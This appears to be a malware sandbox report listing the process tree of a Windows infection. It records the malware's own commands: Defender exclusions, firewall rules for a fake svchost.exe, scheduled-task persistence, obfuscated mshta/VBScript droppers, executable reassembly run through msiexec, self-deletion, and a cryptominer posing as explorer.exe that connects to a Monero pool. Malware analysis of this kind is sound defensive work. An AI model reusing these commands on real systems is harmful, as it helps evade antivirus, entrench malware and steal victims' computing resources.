C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
7⤵
PID:4540

C:\Windows\System32\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
7⤵
PID:8808

C:\Windows\System32\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
7⤵
PID:9056

C:\Windows\SYSTEM32\schtasks.exe
schtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM
7⤵
- Creates scheduled task(s)
PID:8876

C:\Windows\System\svchost.exe
"C:\Windows\System\svchost.exe" formal
7⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Drops file in Windows directory
PID:4596

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
8⤵
PID:3856

C:\Windows\System32\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
8⤵
PID:5400

C:\Windows\System32\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
8⤵
PID:7096

C:\Users\Admin\Pictures\Adobe Films\wcqSDmYAzaQPq4Xjy7T44fGz.exe
"C:\Users\Admin\Pictures\Adobe Films\wcqSDmYAzaQPq4Xjy7T44fGz.exe"
6⤵
PID:4876

C:\Users\Admin\Pictures\Adobe Films\4B8BhDQ9bykNQPmYdw9BOluf.exe
"C:\Users\Admin\Pictures\Adobe Films\4B8BhDQ9bykNQPmYdw9BOluf.exe"
6⤵
- Suspicious use of SetWindowsHookEx
PID:8140

C:\Users\Admin\Pictures\Adobe Films\X5cijgKQfMjKnRprwU8YreFX.exe
"C:\Users\Admin\Pictures\Adobe Films\X5cijgKQfMjKnRprwU8YreFX.exe"
6⤵
- Suspicious use of SetWindowsHookEx
PID:7308

C:\Users\Admin\Pictures\Adobe Films\NF3qvWLxsEGUarpyvx7yOwx_.exe
"C:\Users\Admin\Pictures\Adobe Films\NF3qvWLxsEGUarpyvx7yOwx_.exe"
6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4668

C:\Users\Admin\Pictures\Adobe Films\oDwQ7LEcAjRt4GRKECYkOXaw.exe
"C:\Users\Admin\Pictures\Adobe Films\oDwQ7LEcAjRt4GRKECYkOXaw.exe"
6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4192

C:\Users\Admin\Pictures\Adobe Films\0Vr9D_F8XxNNWHBspJrnqkRj.exe
"C:\Users\Admin\Pictures\Adobe Films\0Vr9D_F8XxNNWHBspJrnqkRj.exe"
6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:7264

C:\Users\Admin\Pictures\Adobe Films\fFavAFyAiEPvlZ6R3Adu8GmC.exe
"C:\Users\Admin\Pictures\Adobe Films\fFavAFyAiEPvlZ6R3Adu8GmC.exe"
6⤵
- Suspicious use of SetThreadContext
PID:6640

C:\Users\Admin\Pictures\Adobe Films\fFavAFyAiEPvlZ6R3Adu8GmC.exe
"C:\Users\Admin\Pictures\Adobe Films\fFavAFyAiEPvlZ6R3Adu8GmC.exe"
7⤵
PID:9616

C:\Users\Admin\Pictures\Adobe Films\fFavAFyAiEPvlZ6R3Adu8GmC.exe
"C:\Users\Admin\Pictures\Adobe Films\fFavAFyAiEPvlZ6R3Adu8GmC.exe"
7⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5228

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
8⤵
- Loads dropped DLL
PID:5796

C:\Users\Admin\Pictures\Adobe Films\6D5w5Q7mL7XYrOJbJ4O_r8jG.exe
"C:\Users\Admin\Pictures\Adobe Films\6D5w5Q7mL7XYrOJbJ4O_r8jG.exe"
6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5568

C:\Users\Admin\Pictures\Adobe Films\ViKM1A7qIBM0V_EEsw4fP8uO.exe
"C:\Users\Admin\Pictures\Adobe Films\ViKM1A7qIBM0V_EEsw4fP8uO.exe"
6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:7800

C:\Users\Admin\Pictures\Adobe Films\PDJ5nXws4PwK00oXif7qvR5J.exe
"C:\Users\Admin\Pictures\Adobe Films\PDJ5nXws4PwK00oXif7qvR5J.exe"
6⤵
PID:1376

C:\Users\Admin\AppData\Roaming\508239.exe
"C:\Users\Admin\AppData\Roaming\508239.exe"
7⤵
PID:9804

C:\Users\Admin\AppData\Roaming\5126552.exe
"C:\Users\Admin\AppData\Roaming\5126552.exe"
7⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:10064

C:\Users\Admin\AppData\Roaming\1342723.exe
"C:\Users\Admin\AppData\Roaming\1342723.exe"
7⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1448

C:\Users\Admin\AppData\Roaming\6793617.exe
"C:\Users\Admin\AppData\Roaming\6793617.exe"
7⤵
- Suspicious behavior: SetClipboardViewer
PID:9276

C:\Users\Admin\AppData\Roaming\8234878.exe
"C:\Users\Admin\AppData\Roaming\8234878.exe"
7⤵
PID:9364

C:\Users\Admin\Pictures\Adobe Films\hNigo7FlxRGV5nnxbOt8EzdA.exe
"C:\Users\Admin\Pictures\Adobe Films\hNigo7FlxRGV5nnxbOt8EzdA.exe"
6⤵
PID:7256

C:\Users\Admin\Pictures\Adobe Films\Q5WuGmJ59r2QogFU0JkU_U8B.exe
"C:\Users\Admin\Pictures\Adobe Films\Q5WuGmJ59r2QogFU0JkU_U8B.exe"
6⤵
- Suspicious use of SetThreadContext
PID:6612

C:\Users\Admin\Pictures\Adobe Films\Q5WuGmJ59r2QogFU0JkU_U8B.exe
"C:\Users\Admin\Pictures\Adobe Films\Q5WuGmJ59r2QogFU0JkU_U8B.exe"
7⤵
PID:4388

C:\Users\Admin\Pictures\Adobe Films\rufUX15_Izc8x9Lg_VUx3Xt3.exe
"C:\Users\Admin\Pictures\Adobe Films\rufUX15_Izc8x9Lg_VUx3Xt3.exe"
6⤵
PID:5300

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbsCript: clOse ( CrEATeObJeCt ( "WscrIpT.sHELl" ). rUn ( "cmd /Q /C copy /y ""C:\Users\Admin\Pictures\Adobe Films\rufUX15_Izc8x9Lg_VUx3Xt3.exe"" ..\z1HFJkPKWMLYRf.EXE && StArt ..\Z1hFJKPKWMLYRf.eXE -pVmK5OY1Q2FwiV3_NJROp~tX8k & IF """" == """" for %s iN ( ""C:\Users\Admin\Pictures\Adobe Films\rufUX15_Izc8x9Lg_VUx3Xt3.exe"" ) do taskkill /Im ""%~Nxs"" -f " , 0,TRUE) )
7⤵
PID:4956

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /C copy /y "C:\Users\Admin\Pictures\Adobe Films\rufUX15_Izc8x9Lg_VUx3Xt3.exe" ..\z1HFJkPKWMLYRf.EXE&& StArt ..\Z1hFJKPKWMLYRf.eXE -pVmK5OY1Q2FwiV3_NJROp~tX8k &IF "" == "" for %s iN ( "C:\Users\Admin\Pictures\Adobe Films\rufUX15_Izc8x9Lg_VUx3Xt3.exe" ) do taskkill /Im "%~Nxs" -f
8⤵
PID:9108

C:\Windows\SysWOW64\taskkill.exe
taskkill /Im "rufUX15_Izc8x9Lg_VUx3Xt3.exe" -f
9⤵
- Kills process with taskkill
PID:7632

C:\Users\Admin\Pictures\Adobe Films\brRLNivI0mn8MoMgDt3QbiRV.exe
"C:\Users\Admin\Pictures\Adobe Films\brRLNivI0mn8MoMgDt3QbiRV.exe"
6⤵
- Loads dropped DLL
PID:8180

C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
7⤵
- Loads dropped DLL
- Adds Run key to start application
PID:4856

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--XpjC5"
8⤵
PID:5384

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x2d8,0x2dc,0x2e0,0x2b4,0x2e4,0x7ffdef52dec0,0x7ffdef52ded0,0x7ffdef52dee0
9⤵
PID:8120

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x134,0x138,0x13c,0x110,0x140,0x7ff7cd179e70,0x7ff7cd179e80,0x7ff7cd179e90
10⤵
PID:5576

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1648,10620972354198065081,8813036227515867356,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5384_1021377643" --mojo-platform-channel-handle=1664 /prefetch:8
9⤵
PID:5900

C:\Users\Admin\Pictures\Adobe Films\X_SBZP5sxufZQk3OLhF8lPwS.exe
"C:\Users\Admin\Pictures\Adobe Films\X_SBZP5sxufZQk3OLhF8lPwS.exe"
6⤵
PID:4684

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\X_SBZP5sxufZQk3OLhF8lPwS.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Pictures\Adobe Films\X_SBZP5sxufZQk3OLhF8lPwS.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )
7⤵
PID:3284

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\X_SBZP5sxufZQk3OLhF8lPwS.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\Admin\Pictures\Adobe Films\X_SBZP5sxufZQk3OLhF8lPwS.exe" ) do taskkill -im "%~NxK" -F
8⤵
PID:7812

C:\Windows\SysWOW64\taskkill.exe
taskkill -im "X_SBZP5sxufZQk3OLhF8lPwS.exe" -F
9⤵
- Kills process with taskkill
PID:9368

C:\Users\Admin\Pictures\Adobe Films\ffskZYr_cWNnRFcTcHnN5XZN.exe
"C:\Users\Admin\Pictures\Adobe Films\ffskZYr_cWNnRFcTcHnN5XZN.exe"
6⤵
- Suspicious use of SetThreadContext
PID:5364

C:\Users\Admin\Pictures\Adobe Films\ffskZYr_cWNnRFcTcHnN5XZN.exe
"C:\Users\Admin\Pictures\Adobe Films\ffskZYr_cWNnRFcTcHnN5XZN.exe"
7⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:5292

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue137fdfa416e28ff.exe
4⤵
PID:4516

C:\Users\Admin\AppData\Local\Temp\7zS07DE1F07\Tue137fdfa416e28ff.exe
Tue137fdfa416e28ff.exe
5⤵
- Executes dropped EXE
PID:4116

C:\Users\Admin\AppData\Roaming\70881.exe
"C:\Users\Admin\AppData\Roaming\70881.exe"
6⤵
PID:5240

C:\Users\Admin\AppData\Roaming\6502571.exe
"C:\Users\Admin\AppData\Roaming\6502571.exe"
6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3580

C:\Users\Admin\AppData\Roaming\5777262.exe
"C:\Users\Admin\AppData\Roaming\5777262.exe"
6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6596

C:\Users\Admin\AppData\Roaming\8571435.exe
"C:\Users\Admin\AppData\Roaming\8571435.exe"
6⤵
- Adds Run key to start application
PID:6884

C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
7⤵
PID:7744

C:\Users\Admin\AppData\Roaming\5659930.exe
"C:\Users\Admin\AppData\Roaming\5659930.exe"
6⤵
PID:6164

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue13a3eaad6ca1da2.exe
4⤵
PID:4648

C:\Users\Admin\AppData\Local\Temp\7zS07DE1F07\Tue13a3eaad6ca1da2.exe
Tue13a3eaad6ca1da2.exe
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4308

C:\Users\Admin\AppData\Local\Temp\7zS07DE1F07\Tue13a3eaad6ca1da2.exe
C:\Users\Admin\AppData\Local\Temp\7zS07DE1F07\Tue13a3eaad6ca1da2.exe
6⤵
- Executes dropped EXE
PID:880

C:\Users\Admin\AppData\Local\Temp\mminer.exe
"C:\Users\Admin\AppData\Local\Temp\mminer.exe"
7⤵
PID:9476

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue13bd9cb08d6.exe /mixone
4⤵
PID:4596

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue13743175c95e24e0.exe
4⤵
PID:4556

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue136037e6ffe49ce8.exe
4⤵
PID:4472

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue13a98da3f882e5.exe
4⤵
PID:4392

C:\Users\Admin\AppData\Local\Temp\is-5T5CA.tmp\Tue136037e6ffe49ce8.tmp
"C:\Users\Admin\AppData\Local\Temp\is-5T5CA.tmp\Tue136037e6ffe49ce8.tmp" /SL5="$60086,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS07DE1F07\Tue136037e6ffe49ce8.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:4860

C:\Users\Admin\AppData\Local\Temp\7zS07DE1F07\Tue136037e6ffe49ce8.exe
"C:\Users\Admin\AppData\Local\Temp\7zS07DE1F07\Tue136037e6ffe49ce8.exe" /SILENT
2⤵
PID:5136

C:\Users\Admin\AppData\Local\Temp\is-FG12P.tmp\Tue136037e6ffe49ce8.tmp
"C:\Users\Admin\AppData\Local\Temp\is-FG12P.tmp\Tue136037e6ffe49ce8.tmp" /SL5="$2030A,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS07DE1F07\Tue136037e6ffe49ce8.exe" /SILENT
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:5408

C:\Users\Admin\AppData\Local\Temp\is-D2TQK.tmp\postback.exe
"C:\Users\Admin\AppData\Local\Temp\is-D2TQK.tmp\postback.exe" ss1
4⤵
- Suspicious use of SetWindowsHookEx
PID:6728

C:\Users\Admin\AppData\Local\Temp\7zS07DE1F07\Tue13743175c95e24e0.exe
Tue13743175c95e24e0.exe
1⤵
- Executes dropped EXE
PID:2700

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
2⤵
PID:4844

C:\Users\Admin\AppData\Local\Temp\inst1.exe
"C:\Users\Admin\AppData\Local\Temp\inst1.exe"
3⤵
- Suspicious use of SetWindowsHookEx
PID:5932

C:\Users\Admin\AppData\Local\Temp\BCleanSoft82.exe
"C:\Users\Admin\AppData\Local\Temp\BCleanSoft82.exe"
3⤵
PID:1448

C:\ProgramData\6003840.exe
"C:\ProgramData\6003840.exe"
4⤵
PID:8756

C:\ProgramData\5074095.exe
"C:\ProgramData\5074095.exe"
4⤵
- Suspicious behavior: SetClipboardViewer
PID:9136

C:\ProgramData\1017834.exe
"C:\ProgramData\1017834.exe"
4⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6352

C:\ProgramData\2512705.exe
"C:\ProgramData\2512705.exe"
4⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3632

C:\ProgramData\2144316.exe
"C:\ProgramData\2144316.exe"
4⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:184

C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe
"C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe"
3⤵
- Suspicious use of SetWindowsHookEx
PID:6748

C:\Users\Admin\AppData\Local\Temp\4.exe
"C:\Users\Admin\AppData\Local\Temp\4.exe"
3⤵
PID:5876

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
4⤵
PID:9100

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
5⤵
PID:7340

C:\Windows\SysWOW64\PING.EXE
ping 1.1.1.1 -n 1 -w 3000
6⤵
- Runs ping.exe
PID:10244

C:\Users\Admin\AppData\Local\Temp\5.exe
"C:\Users\Admin\AppData\Local\Temp\5.exe"
3⤵
PID:6820

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
4⤵
PID:5124

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
5⤵
PID:6960

C:\Windows\SysWOW64\PING.EXE
ping 1.1.1.1 -n 1 -w 3000
6⤵
- Runs ping.exe
PID:6472

C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
3⤵
- Suspicious use of SetWindowsHookEx
PID:6620

C:\Users\Admin\AppData\Local\Temp\is-7K6D8.tmp\setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-7K6D8.tmp\setup.tmp" /SL5="$20390,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe"
4⤵
PID:7208

C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT
5⤵
- Suspicious use of SetWindowsHookEx
PID:7824

C:\Users\Admin\AppData\Local\Temp\is-GAOGQ.tmp\setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-GAOGQ.tmp\setup.tmp" /SL5="$801EA,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT
6⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:8028

C:\Users\Admin\AppData\Local\Temp\is-34A62.tmp\postback.exe
"C:\Users\Admin\AppData\Local\Temp\is-34A62.tmp\postback.exe" ss1
7⤵
- Suspicious use of SetWindowsHookEx
PID:2612

C:\Users\Admin\AppData\Local\Temp\setup_2.exe
"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
3⤵
- Suspicious use of SetWindowsHookEx
PID:888

C:\Users\Admin\AppData\Local\Temp\8.exe
"C:\Users\Admin\AppData\Local\Temp\8.exe"
3⤵
PID:7216

C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
3⤵
PID:7352

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
4⤵
PID:7864

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
5⤵
- Creates scheduled task(s)
PID:2224

C:\Users\Admin\AppData\Roaming\services64.exe
"C:\Users\Admin\AppData\Roaming\services64.exe"
4⤵
PID:8108

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
5⤵
- Blocklisted process makes network request
PID:6820

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
6⤵
- Creates scheduled task(s)
PID:3996

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
5⤵
PID:8820

C:\Windows\explorer.exe
C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
5⤵
PID:9484

C:\Users\Admin\AppData\Local\Temp\7zS07DE1F07\Tue136037e6ffe49ce8.exe
Tue136037e6ffe49ce8.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1956

C:\Users\Admin\AppData\Local\Temp\7zS07DE1F07\Tue13bd9cb08d6.exe
Tue13bd9cb08d6.exe /mixone
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1684

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "Tue13bd9cb08d6.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS07DE1F07\Tue13bd9cb08d6.exe" & exit
2⤵
PID:9004

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "Tue13bd9cb08d6.exe" /f
3⤵
- Kills process with taskkill
PID:3628

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbsCRIpt: CloSE( CReaTeOBJEcT ("WscRiPT.SHEll" ). rUn ("C:\Windows\system32\cmd.exe /r tyPe ""C:\Users\Admin\AppData\Local\Temp\7zS07DE1F07\Tue13bbed6e0bb6.exe"" > 7DLAd.ExE && start 7DLAd.exE /pQoSkdkR0zB4x3ysnvq6jrFRpAvzHo & if """"== """" for %v In ( ""C:\Users\Admin\AppData\Local\Temp\7zS07DE1F07\Tue13bbed6e0bb6.exe"" ) do taskkill -iM ""%~nXv"" /F ", 0, truE) )
1⤵
PID:2284

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /r tyPe "C:\Users\Admin\AppData\Local\Temp\7zS07DE1F07\Tue13bbed6e0bb6.exe" > 7DLAd.ExE && start 7DLAd.exE /pQoSkdkR0zB4x3ysnvq6jrFRpAvzHo &if ""== "" for %v In ( "C:\Users\Admin\AppData\Local\Temp\7zS07DE1F07\Tue13bbed6e0bb6.exe" ) do taskkill -iM "%~nXv" /F
2⤵
PID:5324

C:\Users\Admin\AppData\Local\Temp\7DLAd.ExE
7DLAd.exE /pQoSkdkR0zB4x3ysnvq6jrFRpAvzHo
3⤵
PID:6388

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbsCRIpt: CloSE( CReaTeOBJEcT ("WscRiPT.SHEll" ). rUn ("C:\Windows\system32\cmd.exe /r tyPe ""C:\Users\Admin\AppData\Local\Temp\7DLAd.ExE"" > 7DLAd.ExE && start 7DLAd.exE /pQoSkdkR0zB4x3ysnvq6jrFRpAvzHo & if ""/pQoSkdkR0zB4x3ysnvq6jrFRpAvzHo ""== """" for %v In ( ""C:\Users\Admin\AppData\Local\Temp\7DLAd.ExE"" ) do taskkill -iM ""%~nXv"" /F ", 0, truE) )
4⤵
PID:6860

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /r tyPe "C:\Users\Admin\AppData\Local\Temp\7DLAd.ExE" > 7DLAd.ExE && start 7DLAd.exE /pQoSkdkR0zB4x3ysnvq6jrFRpAvzHo &if "/pQoSkdkR0zB4x3ysnvq6jrFRpAvzHo "== "" for %v In ( "C:\Users\Admin\AppData\Local\Temp\7DLAd.ExE" ) do taskkill -iM "%~nXv" /F
5⤵
PID:6116

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
6⤵
PID:4472

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbSCrIpT:clOsE ( CReaTeobJecT ( "wscRIPT.sHELl" ). ruN( "CmD /q /r Echo | set /p = ""MZ"" > jo4H.q&COPy /B /Y JO4H.Q + XnY7kB~A.WCr +487fXM.V + CHBTE0X.Zm + oD_N_P5.BfY LeJ9.uX & stArT msiexec.exe /y .\LEJ9.uX " , 0 ,TRue ) )
4⤵
PID:8040

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /q /r Echo | set /p = "MZ" > jo4H.q&COPy /B /Y JO4H.Q + XnY7kB~A.WCr +487fXM.V + CHBTE0X.Zm + oD_N_P5.BfY LeJ9.uX&stArT msiexec.exe /y .\LEJ9.uX
5⤵
PID:7388

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" Echo "
6⤵
PID:8124

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" set /p = "MZ" 1>jo4H.q"
6⤵
PID:7260

C:\Windows\SysWOW64\msiexec.exe
msiexec.exe /y .\LEJ9.uX
6⤵
PID:5796

C:\Windows\SysWOW64\taskkill.exe
taskkill -iM "Tue13bbed6e0bb6.exe" /F
3⤵
- Kills process with taskkill
PID:7028

C:\Users\Admin\AppData\Local\Temp\7zS07DE1F07\Tue13a98da3f882e5.exe
Tue13a98da3f882e5.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5088

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:5888

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
2⤵
- Loads dropped DLL
- Modifies registry class
PID:6708

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If "/pO_wtib1KE0hzl7U9_CYP "== "" for %K iN ( "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" ) do taskkill -im "%~NxK" -F
1⤵
PID:7240

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious use of SetWindowsHookEx
PID:7664

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
2⤵
- Loads dropped DLL
PID:4396

C:\Users\Admin\AppData\Local\Temp\1F0B.exe
C:\Users\Admin\AppData\Local\Temp\1F0B.exe
1⤵
PID:10084

C:\Users\Admin\AppData\Local\Temp\1F0B.exe
C:\Users\Admin\AppData\Local\Temp\1F0B.exe
2⤵
PID:13196

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
